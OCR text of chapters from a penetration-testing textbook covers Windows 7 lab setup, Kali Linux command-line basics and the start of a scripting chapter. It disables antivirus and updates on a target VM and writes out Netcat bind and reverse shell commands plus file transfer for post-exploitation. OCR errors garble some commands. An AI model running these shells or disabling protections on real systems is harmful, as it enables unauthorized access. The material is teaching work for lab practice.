<« Systern and Security » Windows Update » Change settings - J ""l ‘ Search Control Panel 2 |

QU

Choose how Windows can install updates

When your computer is online, Windows can autamatically check for important updates and install them
using these settings. When new updates are available, you can also install them before shutting down the
computer,
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Important updates

@ [Neve! check for updates (not recommended) >

Install new updates: | Every day -] at [3:00.am -

Recommended updates

n

[ Give me recommended updates the same way I receive important updates
Who can install updates

] Allow all users to install updates on this computer
Microsoft Update

Give me updates for Microsoft products and check for new optional Microsoft software when T
update Windows

Software notifications

[[] Show me detailed notifications when new Microsoft software is available

Note: Windows Update might update itself automatically first when checking for other updates. Read our
privacy statement online.

B

Figure 1-52: Opting out of automatic updates




Setting a Static IP Address

Set a static IP address by choosing Start » Control Panel » Network and
Internet » Network and Sharing Center » Change Adapter Settings » Local
Area Network. Now right-click and choose Properties » Internet Protocol
Version 4 (TCP/IPv4) » Properties. Set these values as you did for Windows
XP (discussed in “Setting a Static IP Address” on page 38), but use a dif-
ferent value for the Windows 7 IP address, as shown in Figure 1-53. If asked
whether to configure this network as Home, Work, or Public, choose Work.
(Be sure that your virtual machine network setting is configured to use a
bridged adapter.)

e i(TCPﬂM} ﬁroper..ﬁs @

General

‘fou can get IP settings assigned automatically if your network supports
this capability. Otherwise, you need to ask your network administrator
for the appropriate IP settings.

() Obtain an IP address automatically

(@) Use the following IP address:

IP address: 192,168 . 20 . 12
Subnet mask: 255255 ,255. O
Default gateway: _1-9“2_168 Z-D . 1_

Obtain DNS server address automatically
(@) Use the following DNS server addresses:

Preferred DNS server: 192.168. 20 . 1

Alternate DNS server:

[F] validate settings upon exit

[ oK ][ Cancel ]

Figure 1-53: Setting a static IP address

Because the Windows firewall is turned on, Windows 7 won’t respond
to a ping from our Kali system. Therefore, we’ll ping our Kali system
from Windows 7. Start your Kali Linux virtual machine, and from your
Windows 7 virtual machine, click the Start button. Then enter cnd in the
Run dialog to open a Windows command prompt. At the prompt, enter
the following.

ping <IP Address of Kali>

If everything is working, you should see replies to the ping request as in
“Setting a Static IP Address” on page 38.
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Adding a Second Network Interface

Now shut down your Windows 7 virtual machine. We’re going to add a
second network interface to the Windows 7 virtual machine that will allow
the Windows 7 system to be part of two networks. We’ll use this setup dur-
ing post exploitation to simulate attacking additional systems on a second
network.

In VMware Player on Microsoft Windows, choose Player » Manage »
Virtual Machine Settings » Add, select Network Adapter, and press Next.
This adapter will be Network Adapter 2. In VMware Fusion on Mac OS,
go to Virtual Machine Settings, select Add a Device, and select a network
adapter. Set this new adapter to the Host Only network. Press OK, and the
virtual machine should restart. (We do not need to set a static IP address
for Network Adapter 2.) When the virtual machine restarts, open Virtual
Machine Settings again, and you should see the two network adapters
listed. Both should be connected when your computer powers on.

Installing Additional Software

Now install the following software in your Windows 7 virtual machine,
using default settings across the board:

e Java 7 Update 6, an out-of-date version of Java, from hitp://www.oldapps
.com/java.php ?old_java=8120/.

e Winamp version 5.55 from http://www.oldapps.com/winamp.php ?old_
winamp=247/. (Uncheck the changes to your search engine and
SO on.)

e The latest version of Mozilla Firefox from http://www.mozilla.org/.

e Microsoft Security Essentials from http://windows.microsoft.com/en-us/
windows/security-essentials-download/. (Download the latest antivirus sig-
natures, making sure to download the correct version for your 32-bit
Windows install. Don’t turn on automatic sample submission or scan on
install. Also, disable real-time protection for now. We will enable this
feature when we study bypassing antivirus software in Chapter 12. This
setting can be found on the Settings tab under Real-time Protection.
Uncheck Turn on real-time protection (recommended), as shown in
Figure 1-54. Click Save changes.)
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Update @ Help

Scheduled scan
Default actions
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[Z] Turn on real-time protection (recommended)
Real-time protection alerts you whenever malicious or potentially unwanted software
attempts to install itself or run on your PC,
Excluded files and locations
Excluded file types
Excluded processes
Advanced
MAPS

Figure 1-54: Turning off real-time protection

Finally, install the BookApp custom web application found in the torrent
for this book. (IstPentestBook?!is the password for the archive.) Drag and
drop the BookApp folder on the Windows 7 virtual machine. Then follow
the instructions in InstallApp.pdf detailing how to install BookApp. Here is
a high-level overview of the instructions.

1. Run Stepl-install-iis.bat as an administrator by right-clicking the .bat file
and choosing Run as administrator. (Once install finishes, you can close
any DOS windows that are still up.)

2. Navigate to the SQL folder and run SQLEXPRW1 x86_ENU.EXE. Detailed
instructions with screenshots are included in the InstallApp PDEF.

3. Install Service Pack 3 by running SQLServer2008SP3-KB2546951-x86-ENU
.exe. When warned that program has known compatibility issues, click
OK to run it and complete the install. Choose to accept any changes.

4. Using SQL Server Configuration Manager, enable Named Pipes.
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5. Navigate back to the main app folder and run Step2-Modify-F'W.bat as an
administrator.

6. Install XML support for MS SQL with sglxml_x86-v4.exe from the SQL
folder.
Run Step3-Install-App.bat as an administrator from the main app folder.
Use MS SQL Management Studio to run db.sql from the SQL folder, as
described in detail in the InstallApp PDF.

9. Finally, change the user permissions on the Authlnfo.xml file in the book
app folder to give full permissions to IIS_USERS.

Summary

Chapter 1

We set up our virtual environment, downloaded and customized Kali Linux
for attacks, configured our virtual network, and configured our target oper-
ating systems—Windows XP, Windows 7, and Ubuntu.

In the next chapter, we will get used to working with the Linux command
line, and we’ll be on our way to learning how to use the many pentesting
tools and techniques in this book.



USING KALI LINUX

You will use Kali Linux as the attack platform through-
out this book. Kali, the successor to the popular
BackTrack Linux, is a Debian-based distribution that
comes with a plethora of penetration testing tools
preinstalled and preconfigured. Anyone who’s ever
tried to set up a pentesting box from scratch the day

before a big engagement knows that getting everything working correctly
can be a real pain. Having everything preconfigured in Kali can save a lot
of time and headaches. Kali Linux works just like the standard Debian
GNU/Linux distribution, with a lot of extra tools.

Rather than point and click your way through Kali, you’ll use the Linux
command line because that’s where the real power lies. In this chapter we’ll
look at how to perform some common Linux tasks from the command line.
If you're already a Linux expert, you can skip this chapter and move on to
Chapter 3; if not, take some time and dive in.
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Linux Command Line

The Linux command line looks like this:

root@kali:~#

Like a DOS prompt or the Mac OS terminal, the Linux command
line gives you access to a command processor called Bash that allows you
to control the system by entering text-based instructions. When you open
the command line you’ll see the prompt root@kali#. Rootis the superuser
on Linux systems, and it has complete control of Kali.

To perform operations in Linux, you enter commands along with any
relevant options. For example, to view the contents of root’s home directory,
enter the command 1s as shown here.

root@kali:~# 1ls
Desktop

As you can see, there’s not much in the root directory, only a folder
called Desktop.

The Linux Filesystem

Chapter 2

In the Linux world, everything is a file: keyboards, printers, network
devices—everything. All files can be viewed, edited, deleted, created,
and moved. The Linux filesystem is made up of a series of directories
that branch off from the root of the filesystem (/).

To see your current directory, enter pwd at the terminal:

root@kali:~# pwd
/root

Changing Directories

To move to another directory, enter cd directory using either the absolute or
relative path to the new directory, based your current location. The absolute
path is the path to a file in relation to the root directory (/). For example, to
change to your desktop from anywhere, you could enter the absolute path
to the desktop with cd /root/Desktop to reach the root user’s desktop. If you
were in the directory /root (the root user’s home directory), you could use
the relative path to the desktop (that is, relative to your current location) by
entering cd Desktop, which would also take you to the desktop.

The command cd .. takes you back one level in the filesystem, as
shown here.

root@kali:~/Desktop# cd ..
root@kali:~/# cd ../etc
root@kali:/etc#




Entering cd .. from root’s Desktop directory takes us back to root’s home
directory. Entering cd ../etc from there moves us back up to the root of the
filesystem and then to the /etc directory.

Learning About Commands: The Man Pages

To learn more about a command and its options and arguments, you can
view its documentation (called its manual page, or man page) by entering man
command. For example, to learn more about the 1s command enter man 1s as
shown in Listing 2-1.

root@kali:~# man ls
LS(1) User Commands LS(1)

NAME
1s - list directory contents

SYNOPSIS
1s [OPTION]... [FILE]... ®

DESCRIPTION @&
List information about the FILEs (the current directory by default).
Sort entries alphabetically if none of -cftuvSUX nor --sort is speci-
fied.

Mandatory arguments to long options are mandatory for short options
too.

-a, --all ©
do not ignore entries starting with .

-A, --almost-all
do not list implied . and ..
--snip--
-1 use a long listing format
--snip--

Listing 2-1: Linux man page

The man page gives useful (if a bit unfriendly looking) information
about the 1s command including its usage @, description @, and available
options ©.

As you can see in the description section at @, the 1s command lists all
files in the current working directory by default, but you can also use 1s to
get information about a particular file. For example, according to the man
page you can use the -a option with 1s to show all files, including hidden
directories—directories not shown in the default 1s listing—as shown in
Listing 2-2.
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root@kali:~# 1ls -a

.mozilla
. .msf4
.android .mysql_history
.bash_history .nano_history

--snip--

Listing 2-2: Using an option with 1s

As you can see, there are several hidden directories in the root direc-
tory, all of which are preceded by a period (.) character. (In Chapter 8,
we’ll see how these sometimes-hidden directories can lead to a system com-
promise.) You can also see the entries . and .., which denote the current
directory and the parent directory, respectively.

User Privileges

Chapter 2

Linux user accounts offer resources to a particular individual or service.

A user may log in with a password and be offered certain resources on the
Linux system, such as the ability to write files and browse the Internet.
That user may not be able to see files that belong to other users and can
have reasonable assurance that other users can’t see his or her files either.
In addition to traditional user accounts used by a person who logs in with a
password and accesses the system, Linux systems can allow software to have
a user account. The software can have the ability to use system resources
to do its job, but it cannot read other users’ private files. The accepted best
practice on Linux systems is to run day-to-day commands as an unprivileged
user account instead of running everything as the privileged root user to
avoid inadvertently harming your system or granting excessive privilege to
the commands and applications you run.

Adding a User

By default, Kali offers only the privileged root account. Though many
security tools require root privileges to run, you may want to add another
unprivileged account for everyday use to reduce the potential for damage
to your system. Remember, the root account can do anything on Linux,
including corrupting all of your files.

To add a new user georgia to your Kali system use the adduser command,
as shown in Listing 2-3.

root@kali:~# adduser georgia

Adding user "georgia' ...

Adding new group “georgia' (1000) ...

Adding new user “georgia' (1000) with group “georgia' ... @
Creating home directory °/home/georgia’ ... @

Copying files from "/etc/skel'

Enter new UNIX password: ©

Retype new UNIX password:



passwd: password updated successfully
Changing the user information for georgia
Enter the new value, or press ENTER for the default
Full Name []: Georgia Weidman @
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] Y

Listing 2-3: Adding a new user

As you can see, in addition to adding a user to the system, a group georgia
is created, a new user is added to this group @, a home directory is created
for the user @, and the system prompts for information about the user, such
as a password @ and the user’s full name @.

Adding a User to the sudoers File

When you need to do something that requires root privileges as a regular
user, use the sudo command along with the command that you want to run
as root, and then enter your password. For the newly created user georgia
to be able to run privileged commands you need to add her to the sudoers
file, which specifies which users can use the sudo command. To do so, enter
adduser username sudo as shown here.

root@kali:~# adduser georgia sudo

Adding user 'georgia' to group “sudo' ...
Adding user georgia to group sudo
Done.

Switching Users and Using sudo

To switch users in your terminal session, say from the root user to georgia,
use the su command as shown in Listing 2-4.

root@kali:~# su georgia
georgia@kali:/root$ adduser john
bash: adduser: command not found @
georgia@kali:/root$ sudo adduser john
[sudo] password for georgia:

Adding user “john' ... @

Adding new group “john' (1002) ...
Adding new user “john' (1002) with group “john' ...
--snip--

georgia@kali:/root$ su

Password:

root@kali:~#

Listing 2-4: Switching to a different user
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You switch users with the su command. If you try to run commands
(such as the adduser command) that require more privileges than the cur-
rent user (georgia), the command is unsuccessful (command not found) @
because you can run the adduser command only as root.

Luckily, as discussed previously, you can use the sudo command to run
a command as root. Because the georgia user is a member of the sudo group,
you can run privileged commands, and you can see user john is added @ to
the system.

To change back to the root user, enter the su command with no user-
name. You will be prompted for the root’s password (toor).

Greating a New File or Directory

To create a new, empty file called myfile, use the touch command.

root@kali:# touch myfile

To create a new directory in your current working directory, enter mkdir
directory as shown here.

root@kali:~# mkdir mydirectory

root@kali:~# ls

Desktop mydirectory myfile
root@kali:~# cd mydirectory/

Use 1s to confirm that the new directory has been created, and then
change to mydirectory using cd.

Copying, Moving, and Removing Files

To copy a file, use the cp command as shown here.

root@kali:/mydirectory# cp /root/myfile myfile2

The syntax is cp source destination. When using cp, the original file is
left in place, and a copy is made at the desired destination.

Similarly, you can move a file from one location to another using the
mv command. The syntax is identical to cp, but this time the file is removed
from the source location.

You can remove a file from the filesystem by entering rm file. To
remove files recursively use the -r command.

Be careful when removing files, particularly recursively! Some hackers joke that the
first command to teach Linux beginners is rm -1f from the root directory, which forci-
bly deletes the entire filesystem. This teaches new users the power of performing actions
as root. Don’t try that at home!



Adding Text to a File

The echo command echoes what you enter to the terminal, as shown here.

root@kali:/mydirectory# echo hello georgia
hello georgia

To save text to a file, you can redirect your input to a file instead of to
the terminal with the > symbol.

root@kali:/mydirectory# echo hello georgia > myfile

To see the contents of your new file you can use the cat command.

root@kali:/mydirectory# cat myfile
hello georgia

Now echo a different line of text into myfile as shown next.

root@kali:# echo hello georgia again > myfile
root@kali:/mydirectory# cat myfile
hello georgia again

The > overwrites the previous contents of the file. If you echo another
line into myfile, that new line overwrites the output of the previous com-
mand. As you can see, the contents of myfile now reads hello georgia again.

Appending Text to a File

To append text to a file, use >> as shown here.

root@kali:/mydirectory# echo hello georgia a third time >> myfile
root@kali:/mydirectory# cat myfile

hello georgia again

hello georgia a third time

As you can see, appending preserves the previous contents of the file.

File Permissions

If you look at the long output of 1s -1 on myfile, you can see the current per-
missions for myfile.

root@kali:~/mydirectory# 1ls -1 myfile
-IW-r--1-- 1 root root 47 Apr 23 21:15 myfile

From left to right you see the file type and permissions (-rw-r-r--), the
number of links to the file (1), the user and group that own the file (root),
the file size (47 bytes), the last time the file was edited (April 23, 21:15), and
finally the filename (myfile).
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Linux files have permissions to read (r), write (w), and execute (x) and
three sets of user permissions: permissions for the owner, the group, and
all users. The first three letters denote the permissions for the owner, the
following three denote the permissions for the group, and the final three
denote the permissions for all users. Since you created myfile from the root
user account, the file is owned by user 700t and group root, as you can see in
the output with root root. User root has read and write permissions for the
file (xw). Other users in the group, if there are any, can read the file (r) but
not write to or execute it. The last r shows that all users on the filesystem
can read the file.

To change permissions on a file, use the chmod command. You can use
chmod to specify permissions for the owner, the group, and the world. When
specifying permissions use the numbers from 0 through 7 as shown in
Table 2-1.

Table 2-1: Linux File Permissions

Integer Value Permissions Binary Representation
7 full M

6 read and write 110

5 read and execute 101

4 read only 100

3 write and execute on

2 write only 010

1 execute only 001

0 none 000

When entering new file permissions, you use one digit for the owner,
one for the group, and one for world. For example, to give the owner full
permissions but the group and the world no permissions to read, write, or
execute a file, use chmod 700 like this:

root@kali:~/mydirectory# chmod 700 myfile
root@kali:~/mydirectory# 1s -1 myfile
-TWX------ ® 1 root root 47 Apr 23 21:15 myfile

Now when you run the 1s -1 command on myfile, you can see that root
has read, write, and execute (rwx) permissions and the other sets are blank @.
If you try to access the file as any user other than root, you’ll get a permis-
sion denied error.

Editing Files

Perhaps no debate brings out such passion among Linux users as which is
the best file editor. We’ll look at the basics of using two popular editors, vi
and nano, beginning with my favorite, nano.
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root@kali:~/mydirectory# nano testfile.txt

Once in nano you can begin adding text to a new file called ftestfile.ixt.
When you open nano, you should see a blank file with help information for
nano shown at the bottom of the screen, as shown here.

[ New File ]
"G Get Help "0 WriteOut *R Read File "Y Prev Page "K Cut Text ~C Cur Pos
X Exit ~J Justify = “W Where Is "V Next Page "U UnCut Text"T To Spell

To add text to the file, just start typing.

Searching for Text

To search for text in a file, use CTRL-W, and then enter the text to search for
at the search prompt as shown next.

--snip--

Search:georgia

"G Get Help 7Y First Line"T Go To Line“W Beg of ParM-J FullJstifM-B Backwards
~C Cancel "V Last Line "R Replace "0 End of ParM-C Case SensM-R Regexp

Nano should find the text georgia if the word is in the file. To exit,
press CTRL-X. You will be prompted to save the file or lose the changes,
as shown here:

--snip--

Save modified buffer (ANSWERING "No" WILL DESTROY CHANGES) ? Y
Y Yes

N No ~C Cancel

Enter Y to save the file. Now we’ll edit the file with the vi editor.

Editing a File with vi

Add the text in Listing 2-5 to festfile.txt. In addition to the contents of the
file, at the bottom of the vi screen you see some information including the
filename, number of lines, and the current cursor position (see Listing 2-5).

root@kali:~/mydirectory# vi testfile.txt
hi

georgia

we

are

teaching

pentesting

today

"testfile.txt" 7L, 46C 1,1
All

Listing 2-5: Editing files with vi
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Unlike nano, you can’t just start editing the file once it is opened in vi.
To edit a file, enter I to put vi into insert mode. You should see the word
INSERT displayed at the bottom of your terminal. Once you've finished
making changes, press ESC to exit insert mode and return to command
mode. Once in command mode, you can use commands to edit your text.
For example, position the cursor at the line we and enter dd to delete the
word we from the file.

To exit vi, enter :wq to tell vi to write the changes to the file and quit,
as shown in Listing 2-6.

hi

georgia
are
teaching
pentesting
today

1Wq

Listing 2-6: Saving changes in vi

To learn more about available commands for vi and nano, read the corresponding
man pages.

Which editor you use daily is up to you. Throughout this book we’ll use
nano to edit files, but feel free to substitute your editor of choice.

Data Manipulation

Chapter 2

Now for a bit of data manipulation. Enter the text in Listing 2-7 in myfile
using your desired text editor. The file lists some of my favorite security
conferences and the months when they typically happen.

root@kali:~/mydirectory# cat myfile
Derbycon September

Shmoocon January

Brucon September

Blackhat July

Bsides *

HackerHalted October

Hackcon April

~Nouvipds WwWN P

Listing 2-7: Example list for data manipulation



Using grep
The command grep looks for instances of a text string in a file. For example,

to search for all instances of the string September in our file, enter grep
September myfile as follows.

root@kali:~/mydirectory# grep September myfile
1 Derbycon September
3 Brucon September

As you can see, grep tells us that Derbycon and Brucon are in September.

Now suppose you want only the names of the conferences in Septem-
ber but not the number or the month. You can send the output of grep to
another command for additional processing using a pipe (|). The cut com-
mand allows you to take each line of input, choose a delimiter, and print
specific fields. For example, to get just the names of conferences that run in
September you can grep for the word September as you did previously. Next,
you pipe (|) the output to cut, where you specify a space as the delimiter
with the -d option and say you want the second field with the field (-f)
option, as shown here.

root@kali:~/mydirectory# grep September myfile | cut -d " " -f 2
Derbycon
Brucon

The result, as you can see, is that by piping the two commands together
you get just the conferences Derbycon and Brucon.

Using sed

Another command for manipulating data is sed. Entire books have been
written about using sed, but we’ll cover just the basics here with a simple
example of finding a specific word and replacing it.

The sed command is ideal for editing files automatically based on cer-
tain patterns or expressions. Say, for instance, you have a very long file,
and you need to replace every instance of a certain word. You can do this
quickly and automatically with the sed command.

In the language of sed, a slash (/) is the delimiter character. For
example, to replace all instances of the word Blackhat with Defcon in myfile,
enter sed 's/Blackhat/Defcon/' myfile, as shown in Listing 2-8.

root@kali:~/mydirectory# sed 's/Blackhat/Defcon/' myfile
Derbycon September

Shmoocon January

Brucon September

Defcon July

Bsides *

HackerHalted October

Hackcon April

~Nouvh WwWwN R

Listing 2-8: Replacing words with sed
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Pattern Matching with awk

Another command line utility for pattern matching is the awk command.
For example, if you want to find conferences numbered 6 or greater, you
can use awk to search the first field for entries greater than 5, as shown here.

root@kali:~/mydirectory# awk '$1 >5' myfile
6 HackerHalted October
7 Hackcon April

Or, if you want only the first and third words in every line, you can
enter awk '{print $1,$3;}' myfile, as shown in Listing 2-9.

root@kali:~/mydirectory# awk '{print $1,$3;}' myfile
1 September
2 January
3 September
4 July
*

5
6 October
7 April

Listing 2-9: Selecting certain columns with awk

Weve looked at only simple examples of using these data manipulation utilities in
this section. To get more information, consult the man pages. These utilities can be
powerful time-savers.

Managing Installed Packages

Chapter 2

On Debian-based Linux distributions such as Kali Linux, you can use the
Advanced Packaging Tool (apt) to manage packages. To install a package,
enter apt-get install package. For example, to install Raphael Mudge’s front-
end for Metasploit, Armitage, in Kali Linux, enter the following:

root@kali:~# apt-get install armitage

It’s that easy: apt installs and configures Armitage for you.

Updates are regularly released for the tools installed on Kali Linux. To
get the latest versions of the packages already installed, enter apt-get upgrade.
The repositories Kali uses for packages are listed in the file /etc/apt/sources
.list. To add additional repositories, you can edit this file and then run
the command apt-get update to refresh the database to include the new
repositories.



Thas book is built off the base install of Kali 1.0.6 unless otherwise noted in
Chapter 1, so in order to follow along with the book as is, don’t update Kali.

Processes and Services

In Kali Linux you can start, stop, or restart services using the service com-
mand. For example, to start the Apache web server, enter service apache2
start as shown next.

root@kali:~/mydirectory# service apache2 start

[....] Starting web server: apache2: Could not reliably determine the server's
fully qualified domain name, using 127.0.1.1 for ServerName

. ok

Likewise, to stop the MySQL database server, enter service mysql stop.

Managing Networking

When setting up the Kali Linux virtual machines in Chapter 1, you
used the ifconfig command to view network information as shown in
Listing 2-10.

root@kali:~# ifconfig

etho® Link encap:Ethernet HWaddr 00:0c:29:df:7e:4d
inet addr:192.168.20.9® Bcast:192.168.20.255 Mask:255.255.255.00
inet6 addr: fe80::20c:29ff:fedf:7e4d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1756332 errors:930193 dropped:17 overruns:0 frame:0
TX packets:1115419 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1048617759 (1000.0 MiB) TX bytes:115091335 (109.7 MiB)
Interrupt:19 Base address:0x2024

--snip--

Listing 2-10: Viewing networking information with ifconfig

From the output of ifconfig you can glean a lot of information about
your system’s network state. For one, the network interface is called etho @.
The IPv4 address (inet addr) that my Kali box uses to talk to the network
is 192.168.20.9 @ (yours will probably differ). An IP address is a 32-bit label
assigned to devices in a network. The IP address is named up of 4 octets,
or 8-bit parts.
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The address’s network mask, or netmask (Mask), at © identifies which parts
of the IP address are part of the network and which parts belong to the
host. In this case the netmask 255.255.255.0 tells you that the network is the
first three octets, 192.168.20.

The default gateway is where your host routes traffic to other networks.
Any traffic destined outside the local network will be sent to the default
gateway for it to figure out where it needs to go.

root@kali:~# route
Kernel IP routing table

Destination Gateway Genmask Flags Metric Ref Use Iface
default 192.168.20.1@ 0.0.0.0 UG 0 0 0 etho
192.168.20.0 * 255.255.255.0 U 0 0 0 etho

The route command output tells us that the default gateway is
192.168.20.1 @. This makes sense because the system with the IP
address 192.168.20.1 is the wireless router in my home network. Take
note of your own default gateway for use in the following section.

Setting a Static IP Address

By default, your network connection uses dynamic host configuration
protocol (DHCP) to pull an IP address from the network. To set a static
address, so that your IP address won’t change, you need to edit the file
/etc/network/interfaces. Use your preferred editor to open this file. The
default configuration file is shown in Listing 2-11.

# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5s).

# The loopback network interface
auto lo
iface lo inet loopback

Listing 2-11: The default /etc/network/interfaces file

To give your system a static IP address you need to add an entry for the
ethO interface. Add the text shown in Listing 2-12 to /etc/network/interfaces
with the IP addresses changed to match your environment.

# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5s).

# The loopback network interface
auto lo

iface lo inet loopback

auto etho

iface etho inet static @
address 192.168.20.9



netmask 255.255.255.0 @
gateway 192.168.20.1 ©

Listing 2-12: Adding a static IP address

You set the IP address for ethO as static at @. Use the IP address, net-
mask @, and gateway © you found in the previous section to fill in the
information in your file.

Once you’ve made these changes, restart networking with service
networking restart so that the newly added static networking information
will be used.

Viewing Network Connections

To view network connections, listening ports, and so on, use the netstat
command. For example, you can see the programs listening on TCP ports
by issuing the command netstat -antp, as shown in Listing 2-13. Ports are
simply software-based network sockets that listen on the network to allow
remote systems to interact with programs on a system.

root@kali:~/mydirectory# netstat -antp
Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State
PID/Program name

tcpb 0 0 :::80 Tir¥ LISTEN
15090/apache2

Listing 2-13: Using netstat to view listening ports

You see that the Apache web server you started earlier in the chapter is
listening on TCP port 80. (See the man page for other netstat options.)

Netcat: The Swiss Army Knife of TCP/IP Connections

As the man page notes, the Netcat tool is known as the Swiss Army knife
for TCP/IP connections. It’s a versatile tool that we’ll utilize throughout
this book.

To see Netcat’s various options enter nc -h, as shown in Listing 2-14.

root@kali:~# nc -h

[v1.10-40]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -1 -p port [-options] [hostname] [port]
options:
-c shell commands as “-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
--snip--

Listing 2-14: Netcat help information
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Check to See If a Port Is Listening

Let’s have Netcat connect to a port to see if that port is listening for connec-
tions. You saw previously that the Apache web server is listening on port 80
on your Kali Linux system. Tell Netcat to attach to port 80 verbosely, or out-
put rich, with the -v option as shown next. If you started Apache correctly,
you should see the following when attempting to connect the service.

root@kali:~# nc -v 192.168.20.9 80
(UNKNOWN) [192.168.20.10] 80 (http) open

As you can see, Netcat reports that port 80 is indeed listening (open) on
the network. (We’ll look more at open ports and why they are interesting in
Chapter 5’s discussion of port scanning.)

You can also listen on a port for an incoming connection using Netcat,
as shown next.

root@kali:~# nc -lvp 1234
listening on [any] 1234 ...

You use the options 1 for listen, v for verbose, and p to specify the port
to listen on.

Next, open a second terminal window and use Netcat to connect to the
Netcat listener.

root@kali:~# nc 192.168.20.9 1234
hi georgia

Once you connect, enter the text hi georgia, and when you return to the
listener’s terminal window, you see that a connection was received and your
text was printed.

listening on [any] 1234 ..
connect to [192.168.20.9] from (UNKNOWN) [192.168.20.9] 51917
hi georgia

Close down both Netcat processes by pressing CTRL-C.

Opening a Command Shell Listener

Now for something a bit more interesting. When you set up your Netcat
listener, use the -e flag to tell Netcat to execute /bin/bash (or start a Bash
command prompt) when a connection is received. This allows anyone who
connects to the listener to execute commands on your system, as shown next.

root@kali:~# nc -lvp 1234 -e /bin/bash
listening on [any] 1234 ...

Again, use a second terminal window to connect to the Netcat listener.



NOTE

root@kali:~# nc 192.168.20.9 1234
whoami
root

You can now issue Linux commands to be executed by the Netcat lis-
tener. The whoami Linux command will tell you the current logged-in user.
In this case, because the Netcat process was started by the ro0t user, your
commands will be executed as root.

This is a simple example because both your Netcat listener and the connection are on
the same system. You could use another of your virtual machines, or even your host
system, for this exercise as well.

Close down both Netcat processes again.

Pushing a Command Shell Back to a Listener

In addition to listening on a port with a command shell, you can also push
a command shell back to a Netcat listener. This time set up the Netcat lis-
tener without the -e flag as shown next.

root@kali:~# nc -lvp 1234
listening on [any] 1234 ...

Now open a second terminal, and connect back to the Netcat listener
you just created as shown here.

root@kali:~# nc 192.168.20.9 1234 -e /bin/bash

Connect with Netcat as usual, but this time use the -e flag to execute
/bin/bash on the connection. Back in your first terminal you see a connec-
tion as shown next, and if you enter terminal commands, you will see them
executed. (We’ll learn more about listening with /bin/bash on a local port
and actively pushing /bin/bash with a connection, known as bind shells and
reverse shells, respectively, in Chapter 4.)

listening on [any] 1234 ...

connect to [192.168.20.9] from (UNKNOWN) [192.168.20.9] 51921
whoami

root

Now, one more thing with Netcat. This time, instead of outputting what
comes into your listener to the screen, use > to send it to a file as shown next.

root@kali:~# nc -lvp 1234 > netcatfile
listening on [any] 1234 ...

In the second terminal you set up Netcat to connect, but this time you
use the < symbol to tell it to send the contents of a file (myfile) over the
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Netcat connection. Give Netcat a second or two to finish, and then examine
the contents of the file netcatfile created by your first Netcat instance. The
contents should be identical to myfile.

root@kali:~# nc 192.168.20.9 1234 < mydirectory/myfile

You have used Netcat to transfer the file. In this case we’ve simply trans-
ferred the file from one directory to another, but you can imagine how this
technique can be used to transfer files from system to system—a technique
that often comes in handy in the post-exploitation phase of a pentest, once
you have access to a system.

Automating Tasks with cron Jobs

The cron command allows us to schedule tasks to automatically run at a
specified time. In the /etc directory in Kali, you can see several files and
directories related to cron, as shown in Listing 2-15.

root@kali:/etc# 1s | grep cron
cron.d

cron.daily

cron.hourly

cron.monthly

crontab

cron.weekly

Listing 2-15: crontab files

The cron.daily, cron.hourly, cron.monthly, and cron.weekly directories spec-
ify scripts that will run automatically, every day, every hour, every month, or
every week, depending on which directory you put your script in.

If you need more flexibility you can edit cron’s configuration file, /etc/
crontab. The default text is shown in Listing 2-16.

# /etc/crontab: system-wide crontab

# Unlike any other crontab you don't have to run the “crontab’

# command to install the new version when you edit this file

# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom
17* * %k
25 6
47 6
52 6
#

* *

*
*
*

[N

mon dow user command

cd / &% run-parts --report /etc/cron.hourly @

* root test -x /usr/sbin/anacron || ( cd / 8&% run-parts --report /etc/cron.daily ) @
7 root test -x /usr/sbin/anacron || ( cd / &3 run-parts --report /etc/cron.weekly )
* root test -x /usr/sbin/anacron || ( cd / & run-parts --report /etc/cron.monthly )

Listing 2-16: crontab configuration file
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The fields in a crontab are, from left to right, the minute, hour, day of
the month, month, day of the week, user who will run the command, and,
finally, the command to be run. To run a command every day of the week,
every hour, and so on, you use an asterisk (*) instead of specifying a value
for the column.

For example, look at the first crontab line at @, which runs the hourly
cron jobs specified in /etc/cron.hourly. This crontab runs on the 17th minute
of every hour every day of every month on every day of the week. The line
at @ says that the daily crontab (/etc/cron.daily) will be run at the 25th min-
ute of the 6th hour of every day of every month on every day of the week. (For
more flexibility, you can add a line here instead of adding to the hourly, daily,
weekly, or monthly lists.)

Summary

In this chapter we’ve looked at some common Linux tasks. Navigating the
Linux filesystem, working with data, and running services are all skills that
will serve you well as you move through the rest of this book. In addition,
when attacking Linux systems, knowing which commands to run in a Linux
environment will help you make the most of successful exploitation. You
may want to automatically run a command periodically by setting up a cron
job or use Netcat to transfer a file from your attack machine. You will use
Kali Linux to run your attacks throughout this book, and one of your target
systems is Ubuntu Linux, so having the basics in place will make learning
pentesting come more naturally.
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PROGRAMMING

In this chapter we will look at some basic examples

of computer programming. We will look at writing
programs to automate various useful tasks in multiple
programming languages. Even though we use prebuilt
software for the majority of this book, it is useful to be
able to create your own programs.

Bash Scripting

In this section we’ll look at using Bash scripts to run several commands
at once. Bash scripts, or shell scripts, are files that include multiple terminal
commands to be run. Any command we can run in a terminal can be run
in a script.
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Ping

We’ll call our first script pingscript.sh. When it runs, this script will perform
a ping sweep on our local network that sends Internet Control Message
Protocol (ICMP) messages to remote systems to see if they respond.

We’ll use the ping tool to determine which hosts are reachable on a net-
work. (Although some hosts may not respond to ping requests and may be
up despite not being “pingable,” a ping sweep is still a good place to start.)
By default, we supply the IP address or hostname to ping. For example, to
ping our Windows XP target, enter the bold code in Listing 3-1.

root@kali:~/# ping 192.168.20.10

PING 192.168.20.10 (192.168.20.10) 56(84) bytes of data.

64 bytes from 192.168.20.10: icmp_req=1 ttl=64 time=0.090 ms
64 bytes from 192.168.20.10: icmp_req=2 ttl=64 time=0.029 ms
